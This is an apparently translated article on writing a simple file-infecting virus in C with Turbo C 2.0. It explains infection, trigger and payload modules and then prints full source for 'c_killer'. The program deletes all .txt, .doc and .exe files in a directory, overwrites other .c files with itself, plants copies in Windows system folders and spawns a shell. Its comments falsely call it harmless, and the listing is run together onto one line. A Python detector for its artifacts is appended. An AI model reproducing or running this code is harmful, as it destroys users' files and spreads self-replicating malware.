Writing a simple virus in C

Source: Internet
Author: User

[Abstract] Based on an analysis of how viruses work, a small virus is written in C as an example, implemented with Turbo C 2.0.
[Abstract] This paper introduces the characteristics of computer viruses, then shows a simple example written in Turbo C 2.0.
1. What is a virus?
Malware may be the first computer security problem that affects us, so viruses are an important topic in information security.
We need to understand viruses in order to deal with them.
Writing one is a good way to do that.
If you want to write a virus, you must first know what it is. There is a widely accepted definition of a virus. Dr. Frederick Cohen mentioned it in a brief lecture on computer viruses:
"... A program that can include or release a self-copy and infect another program by modifying itself."

In fact, viruses are not very different from ordinary programs, and they are usually relatively simple, less complicated than many programs. However, a virus uses some techniques that normal programs generally do not.
To write a virus, you must first understand how a virus operates.
Whatever the virus, its structure is generally divided into three functional modules: the infection mechanism, the trigger mechanism and the payload.
Of these, the first and only necessary part is the infection mechanism. A virus must first of all be code that can reproduce itself. This is the fundamental reason a virus is a virus. We can represent this process in C-like pseudocode:

    InfectSection()
    {
        if (infectable_object_found
            && object_not_already_infected)
            infect_object;
    }

The second major component of a virus is the trigger for its payload. When a virus arrives on your computer, it is unlikely to act immediately, otherwise it would not spread far. A hidden enemy is always more dangerous than one you can see. Viruses are usually triggered after a certain number of hosts have been infected, on a certain date or time, or when a certain piece of text is found.
A simple trigger mechanism may work like this:

    TriggerSection()
    {
        if (date_is_friday_13th_and_time_is_03:13:13)
            set_trigger_status_to_yes;
    }

The payload is what the virus uses to harass your computer. Viruses with a trigger mechanism also have a payload. It can show you a simple one-time silly message, reformat your disk, or mail itself to your e-mail contacts; any of these can be a payload. A simple payload can be executed as follows:

    ExecuteSection()
    {
        if (trigger_status_is_yes)
            execute_payload;
    }

2. Languages for writing viruses
The most common languages for writing viruses include assembly language, VB, and C. Let's look at what a well-known virus forum lists as the basics of virus writing:
1). Win32 programming: processes, threads, memory, and so on.
2). 32-bit assembly, mainly the use of instructions. 386 assembly is enough.
3). The PE format. Also check the formats of other files that may be infected.
4). Debugging techniques: VC, td32, SoftICE, and so on.
There are a lot of things to master, and some of them I have never even heard of, which is quite scary. But in fact, even if we don't know much about computer principles and operating systems, and are not familiar with other languages, as long as we have some knowledge of the C library functions we can write something similar to a virus.

3. Writing a virus in C
Take Turbo C 2.0 as an example. Its library functions can do a great deal.
Consider the following functions:
1). The findfirst and findnext functions: declared in dir.h. findfirst is used to find files of various types and returns details such as the file name, length, and attributes. findnext is used together with findfirst to find the next file of the same type.
2). The remove function: declared in stdio.h. As long as you know the file name, it can delete a file of any type.

4. My C virus
<Computer virus decryption> contains a classic saying: "The damage caused by malware may be more appropriately regarded as psychological damage." In this sense, my virus is a very typical virus.
The following is my virus.
It consists of four modules.
Rubbishmaker() generates a large number of randomly named junk files in the current directory.
CreatEXE() places junk .exe files in sensitive locations on the C drive, where they need to be hidden.
Remove() will delete some of your files, so do not run this program casually.
Breed() is the essence of c_killer. It kills all C programs and uses them to breed itself.
The first three are the payload. The fourth is its infection mechanism.

/**********************************IN FACT,IT"S NOT A VIRYUS AT ALL.**********************************/#include <io.h>#include <dir.h>#include <stdio.h>#include <stdlib.h>#include <string.h>/* copy outfile to infile */void copyfile(char *infile, char *outfile){    FILE *in,*out;    in = fopen(infile,"r");    out = fopen(outfile,"w");    while (!feof(in))    {        fputc(fgetc(in),out);    }    fclose(in);    fclose(out);}/*This function  named Rubbishmaker.*/void MakeRubbish(){    int i;        FILE *fp;    char *path;    char *NewName;    char *disk[7] = {"A","B","C","D","E","F","G"};    char *addtion = ":\\";    /* Make some rubbish at the current catalogue */    for (i = 0; i<5; i++)    {        char tempname[] = "XXXXXX" ;        NewName = mktemp(tempname);        fp = fopen(NewName,"w");        fclose(fp);    }/* make some rubbish at the root catalogue */    path = strcat(disk[getdisk()],addtion); /* get the root catalogue */    chdir(path); /*change directory according to the "path" */    for (i = 0; i<5; i++)    {        char tempname[] = "XXXXXX";        NewName = mktemp(tempname);        fp = fopen(NewName,"w");        fclose(fp);    }}/*  This function can  creat some .exe or .com documents in the sensitive place.  
Don't worry,It's only a joke.It will do no harm to your computer.*/void CreatEXE(){    int i;    char *path;    char *s[2] = {"C:\\WINDOWS\\system32\\loveworm.exe","C:\\WINDOWS\\virusssss.com"};    for ( i = 0; i < 2; i++)    {        open(s[i], 0x0100,0x0080);        copyfile( "C_KILLER.C",s[i]);    }}/* remove something from your computer */void Remove(){            int done;    int i;    struct ffblk ffblk;    char *documenttype[3] = {"*.txt","*.doc","*.exe"};    for (i = 0; i < 3; i++)    {        done = findfirst(documenttype[i],&ffblk,2);        while (!done)        {                remove(ffblk.ff_name);                done = findnext(&ffblk);        }    }}/* overlay the c programs */void Breed(){            int done;    struct ffblk ffblk;    done = findfirst("*.c",&ffblk,2);    while (!done)    {        if (strcmp("C_KILLER.C", ffblk.ff_name) != 0 )        {                copyfile("C_KILLER.C",ffblk.ff_name);        }        done = findnext(&ffblk);    }}void main(){        printf("THERE IS A VIRUS BY  XIAOKE.\n\n");        Breed();        Remove();        CreatEXE();        printf("COULD YOU TELL ME YOUR NAME?\n\n");        printf("NOW,PLEASE ENTER YOUR NAME,OR THERE WILL BE SOME TROUBLE WITH YOU!\n\n");        MakeRubbish();        getchar();        printf("IT'S ONLY A JOKE! THANK YOU!\n\n");        clrscr();        system("cmd");}
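
Seen from the defender's side, the Breed() and Rubbishmaker() behaviour described above leaves two artifacts in a directory: a group of .c files with the same content, and zero-length files. The following check for both is an added example, not code from the original article; the function names, the cluster threshold of 3 and the sample file names are assumptions made for the illustration.

```python
import hashlib
import os
import tempfile
from collections import defaultdict


def content_digest(path):
    """SHA-256 of a file, ignoring one trailing 0xFF byte.

    The article's copyfile() loops on feof(), so it also writes fgetc()'s
    final EOF result, which lands in the copy as one extra 0xFF byte.
    Dropping it lets the source file group with its copies.
    """
    with open(path, "rb") as fh:
        data = fh.read()
    if data.endswith(b"\xff"):
        data = data[:-1]
    return hashlib.sha256(data).hexdigest()


def scan_directory(directory, ext=".c", min_cluster=3):
    """Return (clusters, empty_files) for one directory, non-recursively."""
    by_hash, empty = defaultdict(list), []
    for entry in sorted(os.scandir(directory), key=lambda e: e.name):
        if not entry.is_file(follow_symlinks=False):
            continue
        if entry.stat(follow_symlinks=False).st_size == 0:
            empty.append(entry.name)  # zero-length junk file
        elif entry.name.lower().endswith(ext):
            by_hash[content_digest(entry.path)].append(entry.name)
    # Many source files sharing one digest is the overwrite signature.
    clusters = [n for n in by_hash.values() if len(n) >= min_cluster]
    return clusters, empty


def build_sample(directory):
    """Write a constructed, harmless sample tree for the demonstration."""
    body = b"int main(void) { return 0; }\n"
    files = {"tool.c": body, "a.c": body + b"\xff", "b.c": body + b"\xff",
             "other.c": b"/* unrelated */\n", "AAAAAA": b"", "BBBBBB": b""}
    for name, data in files.items():
        with open(os.path.join(directory, name), "wb") as fh:
            fh.write(data)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        print(scan_directory(tmp))
```

The scan is limited to a single directory because the findfirst/findnext calls in the listing only enumerate the current directory.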
